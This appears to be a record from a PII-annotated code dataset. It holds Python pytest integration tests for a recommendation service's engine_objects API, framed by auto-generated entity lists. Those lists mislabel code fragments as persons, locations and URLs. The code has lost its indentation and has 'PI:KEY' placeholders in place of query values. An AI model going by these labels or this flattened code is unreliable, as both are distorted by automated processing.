'nacl_core_sdk_gyp'], ['LOCATION', 'nacl_core_sdk_gyp'], ['LOCATION', 'nacl_core_sdk_gyp'], ['LOCATION', 'out_dir_arm'], ['LOCATION', 'nacl_core_sdk_gyp'], ['LOCATION', 'nacl_core_sdk_gyp'], ['LOCATION', 'nacl_core_sdk_gyp'], ['PERSON', 'out_dir_64'], ['DATE_TIME', 'GypNinjaBuild_PPAPI(arch'], ['PERSON', 'ppapi'], ['PERSON', 'ppapi'], ['PERSON', 'arch'], ['PERSON', 'glob.glob(os.path.join(OUT_DIR'], ['PERSON', "GypNinjaBuild_PPAPI('arm"], ['PERSON', "GypNinjaBuild_PPAPI('arm"], ['LOCATION', 'GypNinjaBuild_Pnacl(build_dir'], ['PERSON', 'release_build_dir = os.path.join(OUT_DIR'], ['PERSON', 'pnacl_translator_lib_dir = GetPNaClTranslatorLib(pnacldir'], ['PERSON', 'InstallNaClHeaders(GetToolchainNaClInclude(pepperdir'], ['PERSON', 'InstallNaClHeaders(GetToolchainNaClInclude(pepperdir'], ['LOCATION', 'MakeDirectoryOrClobber(pepperdir'], ['PERSON', 'dirname'], ['PERSON', 'dirname'], ['PERSON', "filters['EXPERIMENTAL"], ['LOCATION', 'BuildStepMakeAll(pepperdir'], ['LOCATION', 'fileroot'], ['PERSON', 'license_files'], ['LOCATION', 'pepperdir'], ['URL', 'archive.si'], ['PERSON', "Bundle('pepper"], ['LOCATION', 'int(pepper_ver'], ['PERSON', 'step_link=True'], ['URL', 'common.Is'], ['LOCATION', 'nacl'], ['PERSON', 'step_link'], ['PERSON', 'tarfile_dir'], ['URL', 'os.path.jo'], ['PERSON', "help='Add qemu"], ['PERSON', 'gypbuild'], ['PERSON', 'optcomplete'], ['PERSON', 'pepperdir = os.path.join(OUT_DIR'], ['PERSON', 'naclsdk_%s.tar.bz2'], ['PERSON', 'BuildStepMakePepperDirs(pepperdir'], ['PERSON', 'sel_ldr_arm'], ['PERSON', 'arm_libs'], ['PERSON', 'qemudir'], ['PERSON', 'qemudir'], ['LOCATION', 'naclport'], ['URL', 'http://crbug.com/245456'], ['URL', 'http://crbug.com/245456'], ['URL', 'https://developer.chrome.com/extensions/manifest/version'], ['URL', 'http://crbug.com/412969.'], ['URL', 'sys.ve'], ['URL', 'sys.st'], ['URL', 'sys.pa'], ['URL', 'os.path.jo'], ['URL', 'sys.pa'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'cygtar.py'], ['URL', 'os.path.jo'], ['URL', 'version.py'], ['URL', 'getos.Ge'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'common.Er'], ['URL', 'getos.Ge'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'common.Er'], ['URL', 'os.path.jo'], ['URL', 'version.py'], ['URL', 'common.Ru'], ['URL', 'os.path.jo'], ['URL', 'os.pa'], 
['URL', 'common.Re'], ['URL', 'common.Ma'], ['URL', 'common.Ma'], ['URL', 'os.path.jo'], ['URL', 'README.Ma'], ['URL', 'os.path.jo'], ['URL', 'text.re'], ['URL', 'text.re'], ['URL', 'text.re'], ['URL', 'version.Ch'], ['URL', 'text.re'], ['URL', 'text.re'], ['URL', 'datetime.datetime.no'], ['URL', 'os.path.jo'], ['URL', 'getos.Ge'], ['URL', 'os.path.jo'], ['URL', 'common.Re'], ['URL', 'common.Ma'], ['URL', 'MAP.ge'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'common.Ru'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'common.Mo'], ['URL', 'common.Re'], ['URL', 'os.path.jo'], ['URL', 'glob.gl'], ['URL', 'common.Er'], ['URL', 'os.path.jo'], ['URL', 'os.path.ba'], ['URL', 'os.path.jo'], ['URL', 'os.path.is'], ['URL', 'os.pa'], ['URL', 'common.Ma'], ['URL', 'os.pa'], ['URL', 'common.Co'], ['URL', 'os.path.jo'], ['URL', 'os.path.re'], ['URL', 'generator.so'], ['URL', 'dyncode.so'], ['URL', 'exception.so'], ['URL', 'mappings.so'], ['URL', 'libppapi.so'], ['URL', 'x32.ne'], ['URL', '32.ne'], ['URL', 'x64.ne'], ['URL', '64.ne'], ['URL', 'arm.ne'], ['URL', 'arm.ne'], ['URL', 'getos.Ge'], ['URL', 'nonsfi.ne'], ['URL', 'os.path.jo'], ['URL', 'common.Ma'], ['URL', 'options.no'], ['URL', 'arm.ne'], ['URL', 'arm.ne'], ['URL', 'nonsfi.ne'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'sdk.gy'], ['URL', 'os.path.jo'], ['URL', 'all.gy'], ['URL', 'getos.Ge'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'breakpad.gy'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'client.gy'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'shim.gy'], ['URL', 'options.no'], ['URL', 'options.ma'], ['URL', 'options.ma'], ['URL', 'options.no'], ['URL', 'getos.Ge'], ['URL', 'dir.re'], ['URL', 'env.it'], ['URL', 'key.st'], ['URL', 'common.Ru'], ['URL', 'os.path.jo'], ['URL', 'common.Ru'], ['URL', 'glob.gl'], ['URL', 'os.path.jo'], ['URL', 'common.Re'], ['URL', 'common.Er'], ['URL', 'os.path.jo'], ['URL', 'os.path.is'], ['URL', 'common.Er'], ['URL', 'common.Co'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'common.Re'], ['URL', 'common.Ma'], ['URL', 't.st'], ['URL', 't.st'], ['URL', 'getos.Ge'], ['URL', 'common.Re'], ['URL', 'os.path.jo'], ['URL', 're.com'], ['URL', 're.ma'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.is'], ['URL', 'os.path.jo'], ['URL', 'notice.Ge'], ['URL', 'os.path.jo'], ['URL', 'files.li'], ['URL', 'filelist.Ve'], ['URL', 'filelist.Pa'], ['URL', 'common.Er'], ['URL', 'files.li'], ['URL', 'filelist.Ve'], ['URL', 'os.path.re'], ['URL', 'os.pa'], ['URL', 'os.path.re'], ['URL', 'os.path.re'], ['URL', 'common.Er'], ['URL', 'common.Ma'], ['URL', 'os.pa'], ['URL', 'common.Ru'], ['URL', 'util.Do'], ['URL', 'util.Ar'], ['URL', 'util.Ge'], ['URL', 'archive.ch'], ['URL', 'bundle.re'], ['URL', 'bundle.re'], ['URL', 'bundle.ve'], ['URL', 'bundle.de'], ['URL', 'bundle.st'], ['URL', 'bundle.re'], ['URL', 'bundle.ar'], ['URL', 'version.Ch'], ['URL', 'common.Ar'], ['URL', 'os.path.ba'], ['URL', 'os.pa'], ['URL', 'version.Ch'], ['URL', 'bundle.Ge'], ['URL', 'common.Ru'], ['URL', 'component.sh'], ['URL', 'tools.tg'], ['URL', 'common.Ru'], ['URL', 'argparse.Ar'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'sdk.py'], ['URL', 'optcomplete.au'], ['URL', 'parser.pa'], ['URL', 'common.Is'], ['URL', 'options.ar'], ['URL', 'getos.Ge'], ['URL', 
'options.ar'], ['URL', 'parser.er'], ['URL', 'version.Ch'], ['URL', 'version.Ch'], ['URL', 'version.Na'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 's.tar.bz'], ['URL', 'os.path.jo'], ['URL', 'options.re'], ['URL', 'options.re'], ['URL', 'os.path.jo'], ['URL', 'install-sysroot.py'], ['URL', 'common.Ru'], ['URL', 'common.Ru'], ['URL', 'common.Ru'], ['URL', 'options.sk'], ['URL', 'common.Mo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'librt.so'], ['URL', 'libpthread.so'], ['URL', 's.so'], ['URL', 'libc.so'], ['URL', 'ld-linux-armhf.so'], ['URL', 'libm.so'], ['URL', 'os.path.jo'], ['URL', 'common.Ma'], ['URL', 'os.path.jo'], ['URL', 'common.Co'], ['URL', 'common.Co'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'options.sk'], ['URL', 'options.cl'], ['URL', 'os.path.jo'], ['URL', 'oshelpers.Co'], ['URL', 'options.ar'], ['URL', 'sys.ar'], ['URL', 'common.Er']] |
35 | # MIT License
# Copyright (c) 2016 Diogo Dutra dummy@email.com
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import asyncio
import tempfile
from datetime import datetime
from time import sleep
from unittest import mock
from swaggerit.models._base import _all_models
from tests.integration.fixtures import TopSellerArrayTest
import pytest
import ujson
@pytest.fixture
def init_db(models, session, api):
user = {
'name': 'test',
'email': 'test',
'password': 'test',
'admin': True
}
session.loop.run_until_complete(models['users'].insert(session, user))
tmp = tempfile.TemporaryDirectory()
store = {
'name': 'test',
'country': 'test',
'configuration': {}
}
session.loop.run_until_complete(models['stores'].insert(session, store))
item_type = {
'name': 'products',
'schema': {
'type': 'object',
'id_names': ['sku'],
'properties': {'sku': {'type': 'string'}}
},
'stores': [{'id': 1}]
}
session.loop.run_until_complete(models['item_types'].insert(session, item_type))
strategy = {
'name': 'test',
'class_module': 'tests.integration.fixtures',
'class_name': 'EngineStrategyTest'
}
session.loop.run_until_complete(models['engine_strategies'].insert(session, strategy))
engine_object = {
'name': 'Top Seller Object',
'type': 'top_seller_array',
'configuration': {'days_interval': 7},
'store_id': 1,
'item_type_id': 1,
'strategy_id': 1
}
session.loop.run_until_complete(models['engine_objects'].insert(session, engine_object))
yield tmp.name
tmp.cleanup()
_all_models.pop('store_items_products_1', None)
class TestEngineObjectsModelPost(object):
async def test_post_without_body(self, init_db, client, headers, headers_without_content_type):
client = await client
resp = await client.post('/engine_objects/', headers=headers)
assert resp.status == 400
assert (await resp.json()) == {'message': 'Request body is missing'}
async def test_post_with_invalid_body(self, init_db, client, headers, headers_without_content_type):
client = await client
resp = await client.post('/engine_objects/', headers=headers, data='[{}]')
assert resp.status == 400
assert (await resp.json()) == {
'message': "'name' is a required property. "\
"Failed validating instance['0'] for schema['items']['required']",
'schema': {
'type': 'object',
'additionalProperties': False,
'required': ['name', 'type', 'configuration', 'strategy_id', 'item_type_id', 'store_id'],
'properties': {
'name': {'type': 'string'},
'type': {'type': 'string'},
'strategy_id': {'type': 'integer'},
'item_type_id': {'type': 'integer'},
'store_id': {'type': 'integer'},
'configuration': {}
}
}
}
async def test_post(self, init_db, client, headers, headers_without_content_type):
client = await client
body = [{
'name': 'Top Seller Object Test',
'type': 'top_seller_array',
'configuration': {'days_interval': 7},
'store_id': 1,
'item_type_id': 1,
'strategy_id': 1
}]
resp = await client.post('/engine_objects/', headers=headers, data=ujson.dumps(body))
resp_json = (await resp.json())
body[0]['id'] = 2
body[0]['store'] = resp_json[0]['store']
body[0]['strategy'] = resp_json[0]['strategy']
body[0]['item_type'] = resp_json[0]['item_type']
assert resp.status == 201
assert resp_json == body
async def test_post_with_invalid_grant(self, client):
client = await client
body = [{
'name': 'Top Seller Object Test',
'type': 'top_seller_array',
'configuration': {'days_interval': 7},
'store_id': 1,
'item_type_id': 1,
'strategy_id': 1
}]
resp = await client.post('/engine_objects/', headers={'Authorization': 'invalid'}, data=ujson.dumps(body))
assert resp.status == 401
assert (await resp.json()) == {'message': 'Invalid authorization'}
class TestEngineObjectsModelGet(object):
async def test_get_not_found(self, init_db, headers_without_content_type, client):
client = await client
resp = await client.get(
'/engine_objects/?store_id=2&item_type_id=1&strategy_id=1',
headers=headers_without_content_type
)
assert resp.status == 404
async def test_get_invalid_with_body(self, init_db, headers, client):
client = await client
resp = await client.get(
'/engine_objects/?store_id=1&item_type_id=1&strategy_id=1',
headers=headers,
data='{}'
)
assert resp.status == 400
assert await resp.json() == {'message': 'Request body is not acceptable'}
async def test_get_valid(self, init_db, headers, headers_without_content_type, client):
body = [{
'name': 'Top Seller Object',
'type': 'top_seller_array',
'configuration': {"days_interval": 7},
'store_id': 1,
'item_type_id': 1,
'strategy_id': 1,
'id': 1,
'store': {
'id': 1,
'name': 'test',
'country': 'test',
'configuration': {}
},
'item_type': {
'id': 1,
'store_items_class': None,
'stores': [{
'configuration': {},
'country': 'test',
'id': 1,
'name': 'test'
}],
'name': 'products',
'schema': {
'type': 'object',
'id_names': ['sku'],
'properties': {'sku': {'type': 'string'}}
},
'available_filters': [{'name': 'sku', 'schema': {'type': 'string'}}]
},
'strategy': {
'id': 1,
'name': 'test',
'class_module': 'tests.integration.fixtures',
'class_name': 'EngineStrategyTest',
'object_types': ['top_seller_array']
}
}]
client = await client
resp = await client.get(
'/engine_objects/?store_id=1&item_type_id=1&strategy_id=1',
headers=headers_without_content_type
)
assert resp.status == 200
assert await resp.json() == body
class TestEngineObjectsModelUriTemplatePatch(object):
async def test_patch_without_body(self, init_db, client, headers, headers_without_content_type):
client = await client
resp = await client.patch('/engine_objects/1/', headers=headers, data='')
assert resp.status == 400
assert (await resp.json()) == {'message': 'Request body is missing'}
async def test_patch_with_invalid_body(self, init_db, client, headers, headers_without_content_type):
client = await client
resp = await client.patch('/engine_objects/1/', headers=headers, data='{}')
assert resp.status == 400
assert (await resp.json()) == {
'message': '{} does not have enough properties. '\
"Failed validating instance for schema['minProperties']",
'schema': {
'type': 'object',
'additionalProperties': False,
'minProperties': 1,
'properties': {
'name': {'type': 'string'},
'configuration': {}
}
}
}
async def test_patch_with_invalid_config(self, init_db, client, headers, headers_without_content_type):
client = await client
body = {
'configuration': {}
}
resp = await client.patch('/engine_objects/1/', headers=headers, data=ujson.dumps(body))
assert resp.status == 400
print(ujson.dumps(await resp.json(), indent=4))
assert (await resp.json()) == {
'message': "'days_interval' is a required property. "\
"Failed validating instance for schema['required']",
'schema': {
'type': 'object',
'required': ['days_interval'],
'additionalProperties': False,
'properties': {
'days_interval': {'type': 'integer'}
}
}
}
async def test_patch_not_found(self, init_db, client, headers, headers_without_content_type):
client = await client
body = {
'name': 'Top Seller Object Test'
}
resp = await client.patch('/engine_objects/2/', headers=headers, data=ujson.dumps(body))
assert resp.status == 404
async def test_patch(self, init_db, client, headers, headers_without_content_type):
client = await client
body = [{
'name': 'Top Seller Object Test',
'type': 'top_seller_array',
'configuration': {'days_interval': 7},
'store_id': 1,
'item_type_id': 1,
'strategy_id': 1
}]
resp = await client.post('/engine_objects/', headers=headers, data=ujson.dumps(body))
obj = (await resp.json())[0]
body = {
'name': 'test2'
}
resp = await client.patch('/engine_objects/2/', headers=headers, data=ujson.dumps(body))
obj['name'] = 'test2'
assert resp.status == 200
assert (await resp.json()) == obj
class TestEngineObjectsModelUriTemplateGet(object):
async def test_get_with_body(self, init_db, headers, client):
client = await client
resp = await client.get('/engine_objects/1/', headers=headers, data='{}')
assert resp.status == 400
assert await resp.json() == {'message': 'Request body is not acceptable'}
async def test_get_not_found(self, init_db, headers_without_content_type, client):
client = await client
resp = await client.get('/engine_objects/2/', headers=headers_without_content_type)
assert resp.status == 404
async def test_get(self, init_db, headers, headers_without_content_type, client):
client = await client
resp = await client.get('/engine_objects/1/', headers=headers_without_content_type)
body = {
'name': 'Top Seller Object',
'type': 'top_seller_array',
'configuration': {"days_interval": 7},
'store_id': 1,
'item_type_id': 1,
'strategy_id': 1,
'id': 1,
'store': {
'id': 1,
'name': 'test',
'country': 'test',
'configuration': {}
},
'item_type': {
'id': 1,
'store_items_class': None,
'stores': [{
'configuration': {},
'country': 'test',
'id': 1,
'name': 'test'
}],
'name': 'products',
'schema': {
'type': 'object',
'id_names': ['sku'],
'properties': {'sku': {'type': 'string'}}
},
'available_filters': [{'name': 'sku', 'schema': {'type': 'string'}}]
},
'strategy': {
'id': 1,
'name': 'test',
'class_module': 'tests.integration.fixtures',
'class_name': 'EngineStrategyTest',
'object_types': ['top_seller_array']
}
}
assert resp.status == 200
assert await resp.json() == body
class TestEngineObjectsModelUriTemplateDelete(object):
async def test_delete_with_body(self, init_db, client, headers):
client = await client
resp = await client.delete('/engine_objects/1/', headers=headers, data='{}')
assert resp.status == 400
assert (await resp.json()) == {'message': 'Request body is not acceptable'}
async def test_delete_valid(self, init_db, client, headers, headers_without_content_type):
client = await client
resp = await client.get('/engine_objects/1/', headers=headers_without_content_type)
assert resp.status == 200
resp = await client.delete('/engine_objects/1/', headers=headers_without_content_type)
assert resp.status == 204
resp = await client.get('/engine_objects/1/', headers=headers_without_content_type)
assert resp.status == 404
def datetime_mock():
mock_ = mock.MagicMock()
mock_.now.return_value = datetime(1900, 1, 1)
return mock_
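# Note: set_patches() below installs this mock in place of the datetime module
# used by swaggerit's job bookkeeping, which is why every time_info assertion
# in these tests expects the frozen '1900-01-01 00:00' start/end stamps.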
async def _wait_job_finish(client, headers_without_content_type, job_name='export'):
sleep(0.05)
while True:
resp = await client.get(
'/engine_objects/1/{}?PI:KEY'.format(job_name),
headers=headers_without_content_type)
if (await resp.json())['status'] != 'running':
break
return resp
def set_patches(monkeypatch):
monkeypatch.setattr('swaggerit.models.orm._jobs_meta.random.getrandbits',
mock.MagicMock(return_value=131940827655846590526331314439483569710))
monkeypatch.setattr('swaggerit.models.orm._jobs_meta.datetime', datetime_mock())
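# With getrandbits pinned to a fixed 128-bit value and datetime frozen, job
# hashes and timestamps become deterministic; the constant job_hash
# '6342e10bd7dca3240c698aa79c98362e' asserted below is presumably just the
# hex rendering of that mocked random value.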
class TestEngineObjectsModelsDataImporter(object):
async def test_importer_post(self, init_db, headers, headers_without_content_type, client, monkeypatch):
set_patches(monkeypatch)
client = await client
resp = await client.post('/engine_objects/1/import_data', headers=headers_without_content_type)
assert resp.status == 201
assert await resp.json() == {'job_hash': '6342e10bd7dca3240c698aa79c98362e'}
await _wait_job_finish(client, headers_without_content_type, 'import_data')
async def test_importer_get_running(self, init_db, headers_without_content_type, client, monkeypatch):
set_patches(monkeypatch)
client = await client
await client.post('/engine_objects/1/import_data', headers=headers_without_content_type)
resp = await client.get('/engine_objects/1/import_data?PI:KEY',
headers=headers_without_content_type)
assert await resp.json() == {'status': 'running'}
await _wait_job_finish(client, headers_without_content_type, 'import_data')
async def test_importer_get_done(self, init_db, headers_without_content_type, client, monkeypatch):
set_patches(monkeypatch)
client = await client
await client.post('/engine_objects/1/import_data', headers=headers_without_content_type)
resp = await _wait_job_finish(client, headers_without_content_type, 'import_data')
assert await resp.json() == {
'status': 'done',
'result': {'lines_count': 3},
'time_info': {
'elapsed': '0:00',
'start': '1900-01-01 00:00',
'end': '1900-01-01 00:00'
}
}
async def test_importer_get_with_error(self, init_db, headers_without_content_type, client, monkeypatch):
set_patches(monkeypatch)
monkeypatch.setattr('tests.integration.fixtures.TopSellerArrayTest.get_data',
mock.MagicMock(side_effect=Exception('testing')))
client = await client
await client.post('/engine_objects/1/import_data', headers=headers_without_content_type)
resp = await _wait_job_finish(client, headers_without_content_type, 'import_data')
assert await resp.json() == {
'status': 'error',
'result': {'message': 'testing', 'name': 'Exception'},
'time_info': {
'elapsed': '0:00',
'start': '1900-01-01 00:00',
'end': '1900-01-01 00:00'
}
}
async def _post_products(client, headers, headers_without_content_type, products=[{'sku': 'test'}]):
resp = await client.post('/item_types/1/items?store_id=1',
data=ujson.dumps(products), headers=headers)
resp = await client.post('/item_types/1/update_filters?store_id=1',
headers=headers_without_content_type)
sleep(0.05)
while True:
resp = await client.get(
'/item_types/1/update_filters?store_id=1&PI:KEY',
headers=headers_without_content_type)
if (await resp.json())['status'] != 'running':
break
return resp
def set_readers_builders_patch(monkeypatch, values=None):
if values is None:
values = [[ujson.dumps({'value': 1, 'item_key': 'test'}).encode()]]
readers_builder = values
mock_ = mock.MagicMock()
mock_.return_value = readers_builder
monkeypatch.setattr(
'myreco.engine_objects.object_base.EngineObjectBase._build_csv_readers',
mock_
)
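# This stands in for EngineObjectBase._build_csv_readers, so the exporter
# consumes the supplied in-memory rows instead of real CSV files; passing an
# empty list of values is how the tests below drive the "No data found"
# EngineError path.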
class TestEngineObjectsModelsObjectsExporter(object):
async def test_exporter_post(self, init_db, headers_without_content_type, headers, client, monkeypatch):
set_patches(monkeypatch)
set_readers_builders_patch(monkeypatch)
client = await client
await _post_products(client, headers, headers_without_content_type)
resp = await client.post('/engine_objects/1/export', headers=headers_without_content_type)
assert await resp.json() == {'job_hash': '6342e10bd7dca3240c698aa79c98362e'}
await _wait_job_finish(client, headers_without_content_type)
async def test_exporter_get_running(self, init_db, headers_without_content_type, headers, client, monkeypatch, loop):
set_patches(monkeypatch)
prods = [ujson.dumps({'value': i, 'item_key': 'test{}'.format(i)}).encode() for i in range(100)]
set_readers_builders_patch(monkeypatch, [[b'\n'.join(prods)]])
client = await client
products = [{'sku': 'test{}'.format(i)} for i in range(10)]
await _post_products(client, headers, headers_without_content_type, products)
await client.post('/engine_objects/1/export', headers=headers_without_content_type)
resp = await client.get(
'/engine_objects/1/export?PI:KEY', headers=headers_without_content_type)
assert await resp.json() == {'status': 'running'}
await _wait_job_finish(client, headers_without_content_type)
async def test_exporter_get_done(self, init_db, headers_without_content_type, headers, client, monkeypatch):
set_patches(monkeypatch)
client = await client
await _post_products(client, headers, headers_without_content_type)
set_readers_builders_patch(monkeypatch)
await client.post('/engine_objects/1/export', headers=headers_without_content_type)
resp = await _wait_job_finish(client, headers_without_content_type)
assert await resp.json() == {
'status': 'done',
'result': {'length': 1, 'max_sells': 1, 'min_sells': 1},
'time_info': {
'elapsed': '0:00',
'start': '1900-01-01 00:00',
'end': '1900-01-01 00:00'
}
}
async def test_exporter_get_with_error(
self, init_db, headers_without_content_type, headers, client, monkeypatch):
set_patches(monkeypatch)
client = await client
await _post_products(client, headers, headers_without_content_type)
set_readers_builders_patch(monkeypatch, [])
await client.post('/engine_objects/1/export', headers=headers_without_content_type)
resp = await _wait_job_finish(client, headers_without_content_type)
assert await resp.json() == {
'status': 'error',
'result': {
'message': "No data found for engine object 'Top Seller Object'",
'name': 'EngineError'
},
'time_info': {
'elapsed': '0:00',
'start': '1900-01-01 00:00',
'end': '1900-01-01 00:00'
}
}
def CoroMock():
coro = mock.MagicMock(name="CoroutineResult")
corofunc = mock.MagicMock(name="CoroutineFunction", side_effect=asyncio.coroutine(coro))
corofunc.coro = coro
return corofunc
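# CoroMock yields an awaitable mock: calling it runs the asyncio.coroutine
# wrapper, and awaiting the result returns corofunc.coro.return_value. A
# minimal usage sketch (names are illustrative, not from the source):
#
#     fetch = CoroMock()
#     fetch.coro.return_value = {'ok': True}
#     result = await fetch()            # -> {'ok': True}
#     fetch.assert_called_once_with()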
def set_data_importer_patch(monkeypatch, mock_=None):
if mock_ is None:
mock_ = mock.MagicMock()
monkeypatch.setattr('tests.integration.fixtures.TopSellerArrayTest.get_data', mock_)
return mock_
class TestEngineObjectsModelsObjectsExporterWithImport(object):
async def test_exporter_post_with_import(self, init_db, headers, headers_without_content_type, client, monkeypatch):
set_patches(monkeypatch)
client = await client
await _post_products(client, headers, headers_without_content_type)
set_readers_builders_patch(monkeypatch)
get_data_patch = set_data_importer_patch(monkeypatch)
get_data_patch.return_value = {}
resp = await client.post('/engine_objects/1/export?import_data=true',
headers=headers_without_content_type)
hash_ = await resp.json()
await _wait_job_finish(client, headers_without_content_type)
called = bool(TopSellerArrayTest.get_data.called)
TopSellerArrayTest.get_data.reset_mock()
assert hash_ == {'job_hash': '6342e10bd7dca3240c698aa79c98362e'}
assert called
async def test_exporter_get_running_with_import(self, init_db, headers, headers_without_content_type, client, monkeypatch):
set_patches(monkeypatch)
client = await client
def func(x, y, z):
sleep(1)
return {}
await _post_products(client, headers, headers_without_content_type)
set_readers_builders_patch(monkeypatch)
set_data_importer_patch(monkeypatch, func)
await client.post('/engine_objects/1/export?import_data=true',
headers=headers_without_content_type)
resp = await client.get(
'/engine_objects/1/export?PI:KEY',
headers=headers_without_content_type)
assert await resp.json() == {'status': 'running'}
await _wait_job_finish(client, headers_without_content_type)
async def test_exporter_get_done_with_import(self, init_db, headers, headers_without_content_type, client, monkeypatch):
set_patches(monkeypatch)
client = await client
await _post_products(client, headers, headers_without_content_type)
set_readers_builders_patch(monkeypatch)
await client.post('/engine_objects/1/export?import_data=true',
headers=headers_without_content_type)
await _wait_job_finish(client, headers_without_content_type)
resp = await client.get(
'/engine_objects/1/export?PI:KEY',
headers=headers_without_content_type)
assert await resp.json() == {
'status': 'done',
'result': {
'importer': {'lines_count': 3},
'exporter': {
'length': 1,
'max_sells': 1,
'min_sells': 1
}
},
'time_info': {
'elapsed': '0:00',
'start': '1900-01-01 00:00',
'end': '1900-01-01 00:00'
}
}
async def test_exporter_get_with_error_in_import_with_import(
self, init_db, headers, headers_without_content_type, client, monkeypatch):
set_patches(monkeypatch)
client = await client
await _post_products(client, headers, headers_without_content_type)
get_data_patch = set_data_importer_patch(monkeypatch)
get_data_patch.side_effect = Exception('testing')
await client.post('/engine_objects/1/export?import_data=true', headers=headers_without_content_type)
await _wait_job_finish(client, headers_without_content_type)
resp = await client.get(
'/engine_objects/1/export?PI:KEY', headers=headers_without_content_type)
assert await resp.json() == {
'status': 'error',
'result': {'message': 'testing', 'name': 'Exception'},
'time_info': {
'elapsed': '0:00',
'start': '1900-01-01 00:00',
'end': '1900-01-01 00:00'
}
}
async def test_exporter_get_with_error_in_export_with_import(
self, init_db, headers, headers_without_content_type, client, monkeypatch):
set_patches(monkeypatch)
client = await client
await _post_products(client, headers, headers_without_content_type)
set_readers_builders_patch(monkeypatch, [])
await client.post('/engine_objects/1/export?import_data=true', headers=headers_without_content_type)
await _wait_job_finish(client, headers_without_content_type)
resp = await client.get(
'/engine_objects/1/export?PI:KEY', headers=headers_without_content_type)
assert await resp.json() == {
'status': 'error',
'result': {
'message': "No data found for engine object 'Top Seller Object'",
'name': 'EngineError'
},
'time_info': {
'elapsed': '0:00',
'start': '1900-01-01 00:00',
'end': '1900-01-01 00:00'
}
}
| 26,915 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2016'], ['PERSON', 'Diogo Dutra'], ['LOCATION', 'DAMAGES'], ['PERSON', 'WHETHER'], ['PERSON', 'engine_object'], ['PERSON', 'data='], ['PERSON', 'data='], ['PERSON', 'data='], ['PERSON', 'data='], ['PERSON', 'data='], ['PERSON', 'data='], ['PERSON', 'test_delete_valid(self'], ['DATE_TIME', "1900-01-01 00:00'"], ['DATE_TIME', "1900-01-01 00:00'"], ['DATE_TIME', "1900-01-01 00:00'"], ['DATE_TIME', "1900-01-01 00:00'"], ['NRP', 'set_readers_builders_patch(monkeypatch'], ['DATE_TIME', "1900-01-01 00:00'"], ['DATE_TIME', "1900-01-01 00:00'"], ['PERSON', 'set_readers_builders_patch(monkeypatch'], ['DATE_TIME', "1900-01-01 00:00'"], ['DATE_TIME', "1900-01-01 00:00'"], ['LOCATION', 'set_data_importer_patch(monkeypatch'], ['LOCATION', 'set_data_importer_patch(monkeypatch'], ['LOCATION', 'set_data_importer_patch(monkeypatch'], ['DATE_TIME', "1900-01-01 00:00'"], ['DATE_TIME', "1900-01-01 00:00'"], ['LOCATION', 'set_data_importer_patch(monkeypatch'], ['DATE_TIME', "1900-01-01 00:00'"], ['DATE_TIME', "1900-01-01 00:00'"], ['PERSON', 'set_readers_builders_patch(monkeypatch'], ['DATE_TIME', "1900-01-01 00:00'"], ['DATE_TIME', "1900-01-01 00:00'"], ['URL', 'email.com'], ['URL', 'swaggerit.mo'], ['URL', 'tests.integration.fi'], ['URL', 'pytest.fi'], ['URL', 'session.loop.ru'], ['URL', 'session.loop.ru'], ['URL', 'session.loop.ru'], ['URL', 'tests.integration.fi'], ['URL', 'session.loop.ru'], ['URL', 'session.loop.ru'], ['URL', 'tmp.na'], ['URL', 'tmp.cl'], ['URL', 'resp.st'], ['URL', 'resp.st'], ['URL', 'resp.st'], ['URL', 'resp.st'], ['URL', 'client.ge'], ['URL', 'resp.st'], ['URL', 'client.ge'], ['URL', 'resp.st'], ['URL', 'tests.integration.fi'], ['URL', 'client.ge'], ['URL', 'resp.st'], ['URL', 'client.pa'], ['URL', 'resp.st'], ['URL', 'client.pa'], ['URL', 'resp.st'], ['URL', 'client.pa'], ['URL', 'resp.st'], ['URL', 'client.pa'], ['URL', 'resp.st'], ['URL', 'client.pa'], ['URL', 'resp.st'], ['URL', 'client.ge'], ['URL', 'resp.st'], ['URL', 'client.ge'], ['URL', 'resp.st'], ['URL', 'client.ge'], ['URL', 